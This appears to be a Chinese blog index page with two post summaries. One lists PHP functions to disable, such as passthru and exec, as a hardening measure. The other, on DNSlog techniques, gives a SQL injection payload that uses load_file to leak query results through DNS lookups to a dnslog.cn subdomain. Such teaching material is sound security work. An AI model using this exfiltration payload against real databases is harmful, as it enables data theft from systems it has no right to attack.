摘要:
零、php需要禁用的函数 phpinfo() 功能描述:输出 PHP 环境信息以及相关的模块、WEB 环境等信息。 危险等级:中 passthru() 功能描述:允许执行一个外部程序并回显输出,类似于 exec()。 危险等级:高 exec() 功能描述:允许执行一个外部程序(如 UNIX Shel 阅读全文
posted @ 2021-07-24 23:36
Ctrl_C+Ctrl_V
阅读(1070)
评论(0)
推荐(0)
摘要:
一、DNS 1、dnslog平台 http://www.dnslog.cn 2、sql注入 使用load_file()函数,前提条件:secure_file_priv为空 select load_file('\\(sql语句).xxxx.dnslog.cn\aaa') 3、命令执行 Windows: 阅读全文
posted @ 2021-07-24 10:59
Ctrl_C+Ctrl_V
阅读(120)
评论(0)
推荐(0)
浙公网安备 33010602011771号